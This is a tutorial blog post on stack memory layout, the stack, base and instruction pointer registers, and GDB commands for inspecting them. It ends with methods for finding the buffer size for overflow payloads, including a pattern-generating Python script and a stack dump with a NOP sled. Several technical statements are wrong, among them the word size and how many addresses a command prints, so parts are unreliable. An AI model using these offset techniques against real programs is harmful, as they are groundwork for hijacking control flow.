How the Stack works

André Eichhofer

The stack is a part of the Random Access Memory (RAM) where local variables are stored. When a program is run by the operating system, the executable will be held in the memory. The memory consists of different areas and looks like the following:

              ┌─────────────────┐
  0xFFFFFFFF  │                 │
              │                 │
              │     Kernel      │
              │                 │
              │                 │
              ├─────────────────┤
              │                 │
              │                 │
              │      Stack      │
              │                 │
              │                 │
              ├─────────────────┤
              │                 │
              │                 │
              │      Heap       │
              │                 │
              │                 │
              ├─────────────────┤
              │                 │
              │      Data       │
              │                 │
              ├─────────────────┤
              │                 │
              │      Text       │
  0x00000000  │                 │
              └─────────────────┘

Kernel: contains command line parameters that are passed to the program
Text: contains the actual code of the programm. Text area is read only, because the code must not be changed
Data: contains initialized and unitialized variables
Heap: contains large objects (images, files etc)
Stack: holds local variables for each of the functions of the program, the stack is writable as the variables may change

When a new function is called, these are pushed on the end of the stack. Since the stack grows downward, every item pushed on top of the stack, will make it grow towards the low memory address area. For example, if a programm calls a function, the parameters of the function are pushed on top of the stack making the other entries of the stack growing downwards.

Structure of the stack

The stack consists of several registers which are used to store data. To simplify the diagram is turned upside down, which means that the higher memory addresses are downside.

                   ┌───────────────────────────┐               
       0x00000000  │                           │               
                   │  extended stack pointer   │               
                   │                           │               
                   ├───────────────────────────┤               
               ▲   │                           │   │           
               │   │                           │   │           
               │   │                           │   │           
               │   │                           │   │           
               │   │          Buffer           │   │           
               │   │                           │   │           
               │   │                           │   │           
               │   │                           │   │           
 stack growth  │   │                           │   │  memory   
               │   ├───────────────────────────┤   │           
               │   │                           │   │           
               │   │   extended base pointer   │   │           
               │   │                           │   │           
               │   ├───────────────────────────┤   │           
               │   │                           │   │           
               │   │    instruction pointer    │   │           
               │   │                           │   ▼           
                   ├───────────────────────────┤               
                   │                           │               
                   │       parent stack        │               
                   │                           │               
      0xFFFFFFFF   └───────────────────────────┘

The content of the registers are variable and are situated at specific addresses in the memory.

The (extended) stack pointer (esp) points to the top of the stack. It is followed by the buffer which holds the content of variabled (or parameters) of a specific function of the programm. The size of the buffer must be allocated by the function of the programm. The address of the esp register is changing constantly.
The (extended) instruction pointer (eip) points to the next instruction the programm is about to execute and hold the return address.
The (extended) base pointer (ebp) stays always the same. That means that we can use the base pointer as an anchor to find parameters and local variables.

Note that dependent from the system the name of the registers are different. In 64-bit-systems the registers are called rsp, rip, rbp, etc.

Examing the stack

Compile a C file, load it in GDB and disasemble a function. The output is something like

(gdb) disas func
0x00000305 <+0> push %ebp
...
...

Examing addresses in the stack

0x00000305 is the address of the instruction written in base 16 or hexadecimal. This is where the instruction lives in the memory. Note that the address consists of 8 characters. In GDB, a word is 4 bytes (1 byte = 8 bits). Addresses are one word, or 8 bytes = 32 bits. That’s why it’s called 32 bit architecture. Registers are also 32 bits.

In 64 bit systems the address my look like

0x0000000000000305 <+0> push %ebp
...

If the program has not been run yet, the registers are empty and if you would want to inspect them you get the error No registers.

Run the program to get the registers filled.

Examine registers in the stack

To examine registers it might be necessary to set a breakpoint before. List the function with

disas/s {name of function}

and set the breakpoint at the specific line

Example: b 9

To get an overview on the recent frame

info frames

You can examine any register in the stack by the following commands:

info registers: overview of registers
info registers {register}: show specific register

You can print the memory (contents) of registers with:

x/ {number of units} {unit} {register / register address}
- number of units: how many units to print
- unit: x(integer, hex), s(string)
- register: register (e.g. $rsp), register address

If you type

x/12x $rsp

GDB will print 100 addresses from the stack pointer register and the output will be something like this

(gdb) x /12x $esp
0x2fc0: 0x00000000  0x00000000  0x00000000  0x00000000
0x2fd0: 0x00000000  0x00000000  0x00000000  0x00000000
0x2fe0: 0x00000000  0x00003fb8  0xffffffff  0x00000001

Note that gdb prints the memory with an offset of 4. Means, that each colum is an address. In more verbose view the output would look like this:

(gdb) x /12x $esp
0x2fc0: 0x00000000 
0x2fd0: 0x00000000 
0x2fe0: 0x00000000  
0x2fea: 0x00003fb8
0x2feb: 0xffffffff
... and so on

To get a more verbose view line by line use commando:

(gdb) x/12s $esp

which prints the content of the memory as string line by line.

Each column (or each address line) represents 1 word. Each word is 4 bytes (or 8 bits).

(gdb) x /12x $esp
0x2fc0: 0x00000000  0x00000000 
            |            |
            V            V
         1 Word       1 Word

Examine (extended) stack pointer

Get content of the stack

The (extended) stack pointer is a marker (register) that points always to the top of the stack. The stack pointer is labeled

$esp in 32-bit architecture and
$rsp in 64-bit architecture

Get the address of the stack pointer with

info frames
info registers
info registers {$rsp} / {$esp}

Get the content of the stack pointer with

x /{number of bytes} {format} $esp / $rsp

Examples:

x /100x $rsp: list 100 bytes of stack pointer in hex format
x /100s $rsp: list 100 bytes of stack pointer in string format

Find variables in the stack

To find the content of variables in the stack, type

info args

and the output could be something like

variable = 0x7fffffffe6a4        "content"
                 |                   |
                 V                   V
         address of variable   content of variable

It’s possible that the address of the variable - 0x7fffffffe6a4 - is located far beyond the base pointer and seems to be out of scope of the stack from current frame. However, the stack might point to that address:

(gdb) x /100x $rsp
0x7fffffffe2a0: 0xffffffff   0x00000000 0xffffe6a4 <–– address of variable

If you print the stack in string format you see the content of the address the stack points to

(gdb) x /100s $rsp
0x7fffffffe2a8: "\244\346\377\377\377\177"
0x7fffffffe2af: ""
0x7fffffffe2b0: "content" <–– content of 0x7fffffffe6a4

Examening (extended) base pointer

The (extended) base pointer is a register that always points to the base of the stack. The base pointer points to a higher memory address from the bottom of the stack downwards. In GDB it is labeled as

$ebp in 32-bit architecture and
$rbp in 64-bit architecture.

Unlike the stack pointer, the base pointer always stays at the same address. That means that all local variables and parameters are at a fixed offset from the base pointer even as the stack pointer moves with push and pop.

Get the address of the stack pointer with

info frames
info registers
info registers {$rbp} / {$rsp}

Get the content of the base pointer with

x /{format} $rbp / $ebp

Examples:
¯¯¯¯¯¯¯¯¯¯¯¯¯

Get memory address of $rbp

(gdb) info frame
rbp at 0x7fffffffe320

Example: Find $rbp in the stack
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

(gdb) x /100x $rsp
...
...
0x7fffffffe320: 0xffffe340   0x00007fff 0x00400593  0 x00000000
       |             |
       V             V
      $rbp       points to higher memory address
...

Get content of $rbp

(gdb) x /x 0x7fffffffe320
0x7fffffffe320: 0xffffe340 <–– $rbp points to 0xffffe340

Examine (extended) instruction pointer

The instruction pointer is a register that points to the next instruction of the function. In GDB it is labeled as

$eip in 32-bit architecture and
$rip in 64-bit architecture.

In the stack the instruction pointer is situated on a little bit higer memory address than the base pointer. The instruction pointer is always located

4 byte offset from base pointer in 32-bit-systems
8 byte offset from base pointer in 64-bit-system

Get the address of the stack pointer with

info frames
info registers
info registers {$eip} / {$rip}

As the instruction pointer is located at a fixed offset from the basepointer you can find the register with

x /x $ebp+4 in 32-bit systems
x /x $rbp+8 in 64-bit systems

Example:
¯¯¯¯¯¯¯¯¯¯¯¯¯

(gdb) x /100x $rsp
...
...
0x7fffffffe310: 0xf7de3b40 0x00007fff   0x00000000 0x00000000
0x7fffffffe320: 0xffffe340 0x00007fff   0x00400593 0x00000000
...                 |                      |
...                 V                      V
               base pointer         instruction pointer

In the example the base pointer is located at the memory address 0x7fffffffe320 and points to the memory address 0xffffe340. The instruction pointer is exactly 8 bytes offset from the rbp at the address 0x7fffffffe328 and it points to the return address 0x00400593.

https://oskarth.com/unix02/

Calculating the buffer size

When testing buffer overflows its necessary to calculate the buffer size to adjust the size of the payload. You can calculate the buffer size from the beginning to the instruction pointer or to any function pointer.

Method 1: Calculate the buffer size manually

For calculating the buffer size you need to make a payload of unique strings and then find a part of that string in the stack.

We create a payload with

350 * letter A and
100 * random numbers

==> 450 bytes

#!/usr/bin/python

attack = 'A' * 350

for i in range(0,5):
   for j in range(0,10):
      attack += str(i) + str(j)

print attack

Make a payload from the python script with

./calculation_payload > calculation

Open the program with gdb and execute it with the payload

(gdb) run < calculation

Print the stack and notice the value of rip

0x7fffffffe400: 0x32343134 0x34343334 0x38333733 0x30343933
                                           |          |
                                           V          V
                                       Instruction Pointer

Here, the $rip is at 0x7fffffffe408 and it contains the values
0x38333733 and 0x30343933.

You need to convert the hex value to ascii and then reverse the value as it is noted in little endian:

38333733 = 8373 => 3738
30343933 = 0493 => 3940

Find the numbers in the payload:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0001020304050607080910111213141516171819202122232425262728293031
3233343536|37383940|414243444546474849
              |
              V
      Ascii value from $rip

Count the A character

= 350

plus the numbers until the 37383940

= 74

Total: 424 characters ==> 424 byte buffer size

Method 2: Use pattern create and pattern offset

The method above can be automated with the scripts pattern create and pattern offet from metasploit framework.

Method 3: Substract the memory address in Gdb

In gdb you can substract memory addresses to get the length of the buffer.

(gdb) x /100x $rsp
0x7fffffffe220: 0xffffffff 0x00000000 0xffffe62c 0x00007fff
0x7fffffffe230: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe240: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe250: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe260: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe270: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe280: 0x90909090 0x90909090 0xcccccccc 0xcccccccc
0x7fffffffe290: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0x7fffffffe2a0: 0xcccccccc 0xcccccccc 0x41414141 0x41414141
                                           |          |
                                           V          V
                                       instruction pointer

In the example above, assume that the buffer begins at the address

0x7fffffffe230

and the instruction pointer is at the address

0x7fffffffe2a8.

As the stack grows from downwards the address 0x7fffffffe2a8 is greater than 0x7fffffffe230. With gdb you can substract the addresses with

(gdb) p/d 0x7fffffffe2a8 - 0x7fffffffe230
$1 = 120

So, the buffer size is 120 byte.

https://0xrick.github.io/binary-exploitation/bof5/